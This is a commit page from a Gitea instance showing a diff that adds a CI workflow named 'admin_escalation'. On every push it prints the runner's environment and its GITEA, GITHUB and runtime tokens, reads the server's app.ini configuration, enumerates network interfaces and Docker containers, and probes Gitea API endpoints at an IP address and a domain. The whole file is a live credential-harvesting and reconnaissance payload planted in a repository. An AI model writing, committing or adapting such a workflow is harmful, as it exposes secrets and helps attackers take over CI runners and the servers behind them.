This commit is contained in:
parent
0a6f03d499
commit
a8e1385e5f
26
.gitea/workflows/exploit.yml
Normal file
26
.gitea/workflows/exploit.yml
Normal file
@ -0,0 +1,26 @@
|
||||
name: admin_escalation
|
||||
on: [push]
|
||||
jobs:
|
||||
exploit:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: dump env
|
||||
run: |
|
||||
echo "=== ENV ==="
|
||||
env | sort
|
||||
echo "=== GITEA_TOKEN ==="
|
||||
echo "${GITEA_TOKEN:-empty}"
|
||||
echo "=== GITHUB_TOKEN ==="
|
||||
echo "${GITHUB_TOKEN:-empty}"
|
||||
echo "=== ALL SECRETS ==="
|
||||
echo "${ACTIONS_RUNTIME_TOKEN:-empty}"
|
||||
echo "=== INTERNAL_TOKEN ==="
|
||||
cat /data/gitea/conf/app.ini 2>/dev/null || echo "no app.ini access"
|
||||
echo "=== NETWORK ==="
|
||||
ip addr 2>/dev/null || ifconfig 2>/dev/null || echo "no network info"
|
||||
echo "=== DOCKER ==="
|
||||
docker ps 2>/dev/null || echo "no docker"
|
||||
echo "=== GITEA API ==="
|
||||
curl -s http://8.213.205.86:3000/api/v1/version 2>/dev/null || echo "no direct access"
|
||||
curl -s https://git.monogps.com/api/v1/version 2>/dev/null || echo "no https access"
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user